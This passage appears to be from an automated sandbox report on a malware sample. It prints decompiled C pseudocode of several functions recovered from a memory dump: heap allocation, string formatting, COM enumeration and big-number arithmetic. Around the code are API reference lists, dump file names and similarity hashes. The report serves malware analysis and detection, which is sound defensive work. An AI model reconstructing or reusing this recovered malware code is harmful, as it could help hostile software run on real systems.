                                                                                                                                                                                                                                0x02bb9f7a
                                                                                                                                                                                                                                0x02bb9f7b
                                                                                                                                                                                                                                0x02bb9f7c
                                                                                                                                                                                                                                0x02bb9f7d
                                                                                                                                                                                                                                0x02bb9f7f
                                                                                                                                                                                                                                0x02bb9f86
                                                                                                                                                                                                                                0x02bb9fcc
                                                                                                                                                                                                                                0x02bb9f88
                                                                                                                                                                                                                                0x02bb9f88
                                                                                                                                                                                                                                0x02bb9f93
                                                                                                                                                                                                                                0x02bb9fa1
                                                                                                                                                                                                                                0x02bb9fa5
                                                                                                                                                                                                                                0x02bb9fbd
                                                                                                                                                                                                                                0x02bb9fa7
                                                                                                                                                                                                                                0x02bb9fb0
                                                                                                                                                                                                                                0x02bb9fb8
                                                                                                                                                                                                                                0x02bb9fb8
                                                                                                                                                                                                                                0x02bb9fa5
                                                                                                                                                                                                                                0x02bb9fd2
                                                                                                                                                                                                                                0x02bb9fd2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb9f71

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB9FE2
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 02BB9FB0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB9FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2631933831-1701360479
                                                                                                                                                                                                                                • Opcode ID: ff493b9a9bc9ea3b41e3bbb3face69a2566a94d79bf7e1f447518029b93cae52
                                                                                                                                                                                                                                • Instruction ID: 185b7f6b12c29ca4c28a6867283d09ed648555a42a0701490fee6fecee600ba6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff493b9a9bc9ea3b41e3bbb3face69a2566a94d79bf7e1f447518029b93cae52
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6311DB5900609AFDB11DFA5CC84DFEBBB9EF08354F5048A9E512E3240D7B0AA459F60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB462F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                                                                                                			E02BB462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2bbd380; // 0x52f9ba8
				_push(0x800);
				_push(0);
				_push( *0x2bbd270);
				if( *0x2bbd284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2bbd284 =  *0x2bbd284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02BB680B(_t44, _t40);
						_t18 = E02BB2274(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2bbd284 < 5) {
								 *0x2bbd284 =  *0x2bbd284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02BB651D();
						HeapFree( *0x2bbd270, 0, _t40);
						goto L10;
					}
					_t24 = E02BBA565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02BB70F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                                                                                                                                                0x02bb462f
                                                                                                                                                                                                                                0x02bb462f
                                                                                                                                                                                                                                0x02bb4632
                                                                                                                                                                                                                                0x02bb4633
                                                                                                                                                                                                                                0x02bb463d
                                                                                                                                                                                                                                0x02bb4644
                                                                                                                                                                                                                                0x02bb4649
                                                                                                                                                                                                                                0x02bb464b
                                                                                                                                                                                                                                0x02bb4651
                                                                                                                                                                                                                                0x02bb4679
                                                                                                                                                                                                                                0x02bb4691
                                                                                                                                                                                                                                0x02bb4693
                                                                                                                                                                                                                                0x02bb4694
                                                                                                                                                                                                                                0x02bb4696
                                                                                                                                                                                                                                0x02bb46d4
                                                                                                                                                                                                                                0x02bb46d4
                                                                                                                                                                                                                                0x02bb46da
                                                                                                                                                                                                                                0x02bb46e0
                                                                                                                                                                                                                                0x02bb46e0
                                                                                                                                                                                                                                0x02bb4698
                                                                                                                                                                                                                                0x02bb469e
                                                                                                                                                                                                                                0x02bb46a1
                                                                                                                                                                                                                                0x02bb46b0
                                                                                                                                                                                                                                0x02bb46b2
                                                                                                                                                                                                                                0x02bb46b9
                                                                                                                                                                                                                                0x02bb46ed
                                                                                                                                                                                                                                0x02bb46f2
                                                                                                                                                                                                                                0x02bb46f4
                                                                                                                                                                                                                                0x02bb46f6
                                                                                                                                                                                                                                0x02bb46f6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb46f4
                                                                                                                                                                                                                                0x02bb46bb
                                                                                                                                                                                                                                0x02bb46c0
                                                                                                                                                                                                                                0x02bb46ce
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb46ce
                                                                                                                                                                                                                                0x02bb4688
                                                                                                                                                                                                                                0x02bb468d
                                                                                                                                                                                                                                0x02bb468d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb468d
                                                                                                                                                                                                                                0x02bb465b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb466a
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02BB4653
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: GetTickCount.KERNEL32 ref: 02BB7108
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB7158
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB7175
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB71A1
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: HeapFree.KERNEL32(00000000,?), ref: 02BB71B3
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: wsprintfA.USER32 ref: 02BB71D4
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: HeapFree.KERNEL32(00000000,?), ref: 02BB71E4
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BB7212
                                                                                                                                                                                                                                  • Part of subcall function 02BB70F4: GetTickCount.KERNEL32 ref: 02BB7223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 02BB4671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,02BBA0CB,?,02BBA0CB,00000002,?,?,02BB58BD,?), ref: 02BB46CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: 006948da17cf1c79510eb8e97ca3a9c69975724ff2786ea895e8da7c3b390650
                                                                                                                                                                                                                                • Instruction ID: 3ac6d4aef641cf6f74e00781af5bd4092cebc6cd913b7bda6d08a8780e321812
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 006948da17cf1c79510eb8e97ca3a9c69975724ff2786ea895e8da7c3b390650
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F213971A4020AAFDB029F64D894AEA37BDFF48384F1004A6F902D7241DBF5E915DFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB2EA6, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 02BB2EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB2FC6
                                                                                                                                                                                                                                  • Part of subcall function 02BB6533: SysAllocString.OLEAUT32(02BBC2B0), ref: 02BB6583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02BB3019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB3028
                                                                                                                                                                                                                                  • Part of subcall function 02BB590A: Sleep.KERNEL32(000001F4), ref: 02BB5952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: fc6d2665e22cc13bf0ab4607a309d819be79f7b0c619b74d6b13c2f300ec5f81
                                                                                                                                                                                                                                • Instruction ID: 4b1a144461f5c8ef963c31698ee2cdebe34a81cf624a5ecbd626aec9a793c81e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc6d2665e22cc13bf0ab4607a309d819be79f7b0c619b74d6b13c2f300ec5f81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E516835900609EFDB12CFA8C854AEEB7B6FF88744F1548A9E915DB210DBB1DD05CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6533, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E02BB6533(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2bbd2e0; // 0x273a5a8
					_t5 = _t103 + 0x2bbe038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2bbc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2bbd2e0; // 0x273a5a8
												_t28 = _t109 + 0x2bbe0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2bbd2e0; // 0x273a5a8
														_t33 = _t79 + 0x2bbe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                                                                                                                                0x02bb6538
                                                                                                                                                                                                                                0x02bb6541
                                                                                                                                                                                                                                0x02bb6542
                                                                                                                                                                                                                                0x02bb6546
                                                                                                                                                                                                                                0x02bb654c
                                                                                                                                                                                                                                0x02bb6552
                                                                                                                                                                                                                                0x02bb655b
                                                                                                                                                                                                                                0x02bb6561
                                                                                                                                                                                                                                0x02bb656b
                                                                                                                                                                                                                                0x02bb656d
                                                                                                                                                                                                                                0x02bb6573
                                                                                                                                                                                                                                0x02bb6578
                                                                                                                                                                                                                                0x02bb6583
                                                                                                                                                                                                                                0x02bb6589
                                                                                                                                                                                                                                0x02bb658e
                                                                                                                                                                                                                                0x02bb66b0
                                                                                                                                                                                                                                0x02bb6594
                                                                                                                                                                                                                                0x02bb6594
                                                                                                                                                                                                                                0x02bb65a1
                                                                                                                                                                                                                                0x02bb65a7
                                                                                                                                                                                                                                0x02bb65ad
                                                                                                                                                                                                                                0x02bb65b1
                                                                                                                                                                                                                                0x02bb65b7
                                                                                                                                                                                                                                0x02bb65c4
                                                                                                                                                                                                                                0x02bb65c8
                                                                                                                                                                                                                                0x02bb65ce
                                                                                                                                                                                                                                0x02bb65d1
                                                                                                                                                                                                                                0x02bb65d9
                                                                                                                                                                                                                                0x02bb65da
                                                                                                                                                                                                                                0x02bb65de
                                                                                                                                                                                                                                0x02bb65e2
                                                                                                                                                                                                                                0x02bb65e5
                                                                                                                                                                                                                                0x02bb65e8
                                                                                                                                                                                                                                0x02bb65ee
                                                                                                                                                                                                                                0x02bb65f7
                                                                                                                                                                                                                                0x02bb65fd
                                                                                                                                                                                                                                0x02bb65fe
                                                                                                                                                                                                                                0x02bb6601
                                                                                                                                                                                                                                0x02bb6602
                                                                                                                                                                                                                                0x02bb6603
                                                                                                                                                                                                                                0x02bb660b
                                                                                                                                                                                                                                0x02bb660c
                                                                                                                                                                                                                                0x02bb660d
                                                                                                                                                                                                                                0x02bb660f
                                                                                                                                                                                                                                0x02bb6613
                                                                                                                                                                                                                                0x02bb6617
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb661d
                                                                                                                                                                                                                                0x02bb6626
                                                                                                                                                                                                                                0x02bb662c
                                                                                                                                                                                                                                0x02bb6636
                                                                                                                                                                                                                                0x02bb663a
                                                                                                                                                                                                                                0x02bb663c
                                                                                                                                                                                                                                0x02bb6649
                                                                                                                                                                                                                                0x02bb664d
                                                                                                                                                                                                                                0x02bb6655
                                                                                                                                                                                                                                0x02bb665a
                                                                                                                                                                                                                                0x02bb666c
                                                                                                                                                                                                                                0x02bb666e
                                                                                                                                                                                                                                0x02bb6674
                                                                                                                                                                                                                                0x02bb6674
                                                                                                                                                                                                                                0x02bb667d
                                                                                                                                                                                                                                0x02bb667d
                                                                                                                                                                                                                                0x02bb667f
                                                                                                                                                                                                                                0x02bb6685
                                                                                                                                                                                                                                0x02bb6685
                                                                                                                                                                                                                                0x02bb6688
                                                                                                                                                                                                                                0x02bb668e
                                                                                                                                                                                                                                0x02bb6691
                                                                                                                                                                                                                                0x02bb669a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb669a
                                                                                                                                                                                                                                0x02bb65ee
                                                                                                                                                                                                                                0x02bb65e8
                                                                                                                                                                                                                                0x02bb65d1
                                                                                                                                                                                                                                0x02bb66a0
                                                                                                                                                                                                                                0x02bb66a0
                                                                                                                                                                                                                                0x02bb66a6
                                                                                                                                                                                                                                0x02bb66a6
                                                                                                                                                                                                                                0x02bb66ac
                                                                                                                                                                                                                                0x02bb66ac
                                                                                                                                                                                                                                0x02bb66b5
                                                                                                                                                                                                                                0x02bb66bb
                                                                                                                                                                                                                                0x02bb66bb
                                                                                                                                                                                                                                0x02bb6578
                                                                                                                                                                                                                                0x02bb66c4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BBC2B0), ref: 02BB6583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BB6664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02BB66AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 94489ea63e64f280d9628c0b98dce790e80c20dc2c33b1c4ddc929cbbaa0ee1b
                                                                                                                                                                                                                                • Instruction ID: f92efad2bca671f7ee292d06057d72768b43bc76e54133658cbe2ff02944be9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94489ea63e64f280d9628c0b98dce790e80c20dc2c33b1c4ddc929cbbaa0ee1b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C514B75D00519EFCB02DFB8C8889EEB7BAFF88704B144599E916EB214D771AD41CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB4EEE, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E02BB4EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02BB650C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02BB5450(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02BB7436(_t101,  &_v428, _a8, _t96 - _t81);
					E02BB7436(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02BB5450(_t101, 0x2bbd168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02BB5450(_a16, _a4);
						E02BB1072(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02BBAEC0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02BBAEBA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02BB6A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02BB67D9(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02BB5465(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2bbd168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                                                                                                                0x02bb4ef1
                                                                                                                                                                                                                                0x02bb4efd
                                                                                                                                                                                                                                0x02bb4f03
                                                                                                                                                                                                                                0x02bb4f08
                                                                                                                                                                                                                                0x02bb4f0c
                                                                                                                                                                                                                                0x02bb507e
                                                                                                                                                                                                                                0x02bb5082
                                                                                                                                                                                                                                0x02bb5082
                                                                                                                                                                                                                                0x02bb4f12
                                                                                                                                                                                                                                0x02bb4f16
                                                                                                                                                                                                                                0x02bb4f1a
                                                                                                                                                                                                                                0x02bb4f1d
                                                                                                                                                                                                                                0x02bb4f28
                                                                                                                                                                                                                                0x02bb4f2e
                                                                                                                                                                                                                                0x02bb4f33
                                                                                                                                                                                                                                0x02bb4f36
                                                                                                                                                                                                                                0x02bb4f50
                                                                                                                                                                                                                                0x02bb4f5f
                                                                                                                                                                                                                                0x02bb4f6b
                                                                                                                                                                                                                                0x02bb4f75
                                                                                                                                                                                                                                0x02bb4f7a
                                                                                                                                                                                                                                0x02bb4f7c
                                                                                                                                                                                                                                0x02bb4f7f
                                                                                                                                                                                                                                0x02bb5036
                                                                                                                                                                                                                                0x02bb503c
                                                                                                                                                                                                                                0x02bb504d
                                                                                                                                                                                                                                0x02bb5060
                                                                                                                                                                                                                                0x02bb5076
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb507b
                                                                                                                                                                                                                                0x02bb4f88
                                                                                                                                                                                                                                0x02bb4f8f
                                                                                                                                                                                                                                0x02bb4f93
                                                                                                                                                                                                                                0x02bb4f99
                                                                                                                                                                                                                                0x02bb4f9b
                                                                                                                                                                                                                                0x02bb4f9d
                                                                                                                                                                                                                                0x02bb4f9f
                                                                                                                                                                                                                                0x02bb4fa1
                                                                                                                                                                                                                                0x02bb4fab
                                                                                                                                                                                                                                0x02bb4fb0
                                                                                                                                                                                                                                0x02bb4fb2
                                                                                                                                                                                                                                0x02bb4fb4
                                                                                                                                                                                                                                0x02bb4fb5
                                                                                                                                                                                                                                0x02bb4fb6
                                                                                                                                                                                                                                0x02bb4fb7
                                                                                                                                                                                                                                0x02bb4fbe
                                                                                                                                                                                                                                0x02bb4fc5
                                                                                                                                                                                                                                0x02bb4fc8
                                                                                                                                                                                                                                0x02bb4fc8
                                                                                                                                                                                                                                0x02bb4f95
                                                                                                                                                                                                                                0x02bb4f95
                                                                                                                                                                                                                                0x02bb4f95
                                                                                                                                                                                                                                0x02bb4fd0
                                                                                                                                                                                                                                0x02bb4fd8
                                                                                                                                                                                                                                0x02bb4fe4
                                                                                                                                                                                                                                0x02bb4fe9
                                                                                                                                                                                                                                0x02bb4fe9
                                                                                                                                                                                                                                0x02bb4fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4ff0
                                                                                                                                                                                                                                0x02bb4ff3
                                                                                                                                                                                                                                0x02bb5000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5002
                                                                                                                                                                                                                                0x02bb5002
                                                                                                                                                                                                                                0x02bb500f
                                                                                                                                                                                                                                0x02bb4fe9
                                                                                                                                                                                                                                0x02bb4fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4fee
                                                                                                                                                                                                                                0x02bb5019
                                                                                                                                                                                                                                0x02bb501c
                                                                                                                                                                                                                                0x02bb501f
                                                                                                                                                                                                                                0x02bb5026
                                                                                                                                                                                                                                0x02bb5026
                                                                                                                                                                                                                                0x02bb5033
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5033
                                                                                                                                                                                                                                0x02bb4f1f
                                                                                                                                                                                                                                0x02bb4f23
                                                                                                                                                                                                                                0x02bb4f24
                                                                                                                                                                                                                                0x02bb4f26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb4f26
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BB4FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BB4FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB5060
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB5076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
